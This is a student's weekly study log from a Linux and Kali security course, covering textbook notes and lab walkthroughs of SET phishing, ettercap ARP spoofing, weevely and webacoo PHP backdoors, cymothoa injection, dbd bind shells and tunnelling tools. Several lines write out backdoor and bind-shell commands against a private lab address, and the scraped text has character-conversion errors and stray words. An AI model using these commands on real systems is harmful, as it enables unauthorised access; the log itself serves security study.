第八週總結

教材學習總結

本週主要學習教材第八章
Linux操做系統結構包括Linux內核,一些GNU運行庫和工具,命令行shell,圖形化界面X窗口系統及相應桌面環境,其操做系統內核屬於一種典型的宏結構。
Linux內核使用了虛擬文件管理VFS機制。
Linux的一個基本特色是抽象了設備的處理,全部的硬件設備都像常規文件同樣看待。Linux支持三類硬件設備:字符設備,塊設備和網絡設備。
Linux用戶信息保存在系統的/etc/passwd文件中,只對Root可讀。
爲了可以給不一樣的應用軟件,網絡服務提供統一的身份認證機制,Linux系統中提供了PAM(可插入身份認證模塊)。PAM支持的四種管理界面爲:認證管理,帳號管理,密碼管理,會話管理。
在Linux中,每一個用戶的專屬初始目錄的默認權限爲rwx------,即只有全部者用戶具備瀏覽,刪除,修改和進入的權限,執行mkdir命令所建立的目錄,其默認權限爲rwxr-xr-x.
支持攻擊者進行自動化的遠程口令猜想工具不少,比較流行的有:Brutus(最快,最靈活的遠程口令猜想破解工具)。THC Hydra(很是快速的網絡身份認證口令猜想工具),Cain and Abel(黑界騎兵)。
LAMP是目前最爲流行的web網站構建解決方案。
Linux系統經過簡單的配置「ip_forward=1」就可以以路由器模式運行,Linux內核中由net子系統的route.c來主要實現路由器的尋址與數據包的轉發功能。
wireshark與tshark使用dumpcap來進行網絡流量監聽,在那些須要特權才能捕獲網絡流量的平臺上,只須要dumpcap設置爲運行在特權用戶帳戶下,而wireshark與tshark則無需特權就能夠運行。
Linux系統上的用戶帳戶分爲Root,普通用戶與系統用戶三大類。攻擊者在獲得本地受限用戶訪問權以後,最簡單的特權提高途徑就是可以破解出Root用戶的口令,而後執行su或sudo命令進行提高。第二種特權提高途徑是發掘並利用su或sudo程序中的安全漏洞。
Linux系統的主要審計日誌集中地/var/log目錄下,主要由系統核心進程,syslogd與各個網絡服務提供事件審計功能。
最多見的Linux系統後門是提供遠程命令行shell的訪問,一般是使用netcat等後門工具在系統上運行,開放監聽一個TCP端口,在接收到請求以後返回一個LInux系統shell與客戶端進行交互。php

視頻學習總結

31.KaliSecurity - 漏洞利用之SET

瞭解kali下漏洞利用工具中set工具的使用
Social Engineering Toolkit是一個開源工具,Python驅動的社會工程學滲透測試工具,提供了很是豐富的攻擊向量庫,是開源的社會工程學利用套件,一般結合Metas來使用。
1.打開終端:

2.輸入1回車進入社會工程學攻擊:

共有11個模塊,分別爲

3.輸入1進入魚叉式釣魚攻擊。

此攻擊向量主要目的爲發送存在惡意軟件的釣魚郵件,相應的payload能夠選擇不一樣的漏洞(選項2)。

4.返回主菜單,選2進入網站攻擊框架



5.選擇3,進入介質感染攻擊

藉助Autorun.inf執行Exploit獲得一個返回的shell,也能夠結合Metasploit的後門。
6.建立payload和監聽器


7.選擇5 羣發郵件攻擊,支持導入列表並向列表中的每一個人發送郵件
八、基於Arduino
九、短信欺騙攻擊
十、無線接入點攻擊:無線接入點攻擊會建立一個虛擬無線AP,經過接入點ap能夠抓取全部鏈接進來的設備流量。
十一、二維碼攻擊:填入一個危險的URL,使得被攻擊者掃描二維碼自動訪問頁面中招

十二、PowerShell攻擊:針對Vista以上的PowerShell攻擊模塊
1三、Fast-Track攻擊模塊java

32.KaliSecurity - 嗅探欺騙與中間人攻擊

瞭解kali下嗅探欺騙工具的使用,並完成中間人攻擊實驗,這裏介紹進行ARP欺騙、DNS欺騙和嗅探以及會話劫持的方法。
一、爲Kali設置開啓端口轉發

二、設置ssltrip

三、ettercap的準備


4.ettercap使用
打開圖形化界面

選擇嗅探網卡 默認eth0

打開ettercap,選擇sniff選項-unified sniffing-選擇網卡-hosts選項:先scan for hosts,等掃描完了選host list。

把網關安排到target1,想攻擊的目標放到target2,mitm選項卡選擇arp poisioning,而後start便可。

瀏覽器無響應,沒法進入淘寶頁面查看結果。
五、Dsniff套裝介紹


六、會話劫持


七、圖片截獲

八、DNS欺騙

九、URL監控

十、下載軟件監控
web

33.KaliSecurity - 權限維持以後門

瞭解kali權限維持工具中後門的使用,權限維持包含Tunnel工具集、Web後門、系統後門三個子類。其中系統後門與Web後門統稱爲後門,都是爲滲透測試後,爲方便再次進入系統而留下的惡意程序。
1.weevely


生成一個php後門,weevely generate test ~/1.php, test爲密碼,在本地生成~/1.php

查看生成的後門

後門上傳到web,使用weevely鏈接
(1)複製後門
(2)查看目標機ip

(3)ssh鏈接

用ssh沒法鏈接到目標機
(4)nano 1.php 複製生成文件內容到其中
(5)使用命令weevely http://192.168.199.149/1.php test進行鏈接

生成後門

查看生成的後門

nano 2.php 複製生成文件內容到其中
上傳到網站後,使用webacoo鏈接:webacoo -t -u http://192.168.199.149/2.php
3.Cymothoa系統後門

枚舉/bin/bash進程pid

cymothoa -10500 -s -0 -y 2333 (注入2333端口),若是成功,能夠鏈接2333端口返回一個shell
4.dbd,sdb:增強版的nc
監聽端:dbd -l -p 2333 -e /bin/bash -k password
攻擊端:dbd 127.0.0.1 2333 -k password
5.U3-Pwn:與Metasploit Payload結合使用的工具,菜單能夠單刀多針對移動光驅設備如光驅鏡像,u盤等。
6.Intersect
2,列出可使用的模塊

1,建立後門腳本

自動添加組件。生成一個shell

建立後門




執行後門
(1)輸入./1.py -b進行綁定

(2)使用nc命令進行鏈接

(3)執行成功,返回一個shell

sql

34.KaliSecurity - 權限維持之Tunnel

瞭解kali權限維持中tunnel工具的使用,Tunnel工具集包含了一系列用於創建通訊隧道、代理的工具。
一、CryptCat:與dbd/sbd使用也相似。
二、DNS2TCP:


三、Iodine:與DNS2TCP相似
四、Miredo:Miredo是一個網絡工具,主要用於BSD和Linux的IPV6 Teredo隧道轉換,能夠轉換不支持IPV6的網絡鏈接IPV6,內核中須要有IPV6和TUN隧道支持。
五、Proxychains:
內網滲透測試常常會用到一款工具,如咱們使用Meterpreter開設一個Socks4a代理服務,經過修改/etc/prosychains.conf配置文件,加入代理,便可使其餘工具如sqlmap、namp直接使用代理掃描內網。
六、Proxytunnel

七、Ptunnel:藉助ICMP數據包創建隧道通訊
八、Pwant:內網下經過UDP通訊
九、sslh

10.stunnel
11.udptunnelshell

35.KaliSecurity - 逆向工程工具

瞭解kali下的逆向工程工具

一、Edb-Debugger

EDB(Evan's Debugger)是一個基於Qt4開發的二進制調試工具,主要是爲了跟OllyDbg工具看齊,經過插件體系能夠進行功能的擴充,當前只支持Linux。
二、Ollydbg

經典的Ring3級調試器,是一個動態調試工具,將IDA與SoftICE結合起來的思想。在Kali下是Wine方式運行的Ollydbg。
三、jad:java反編譯工具
四、Redare2

五、Recstudio2

六、Apktool



9.Flasm

10.Javasnoop

瀏覽器

相關文章
相關標籤/搜索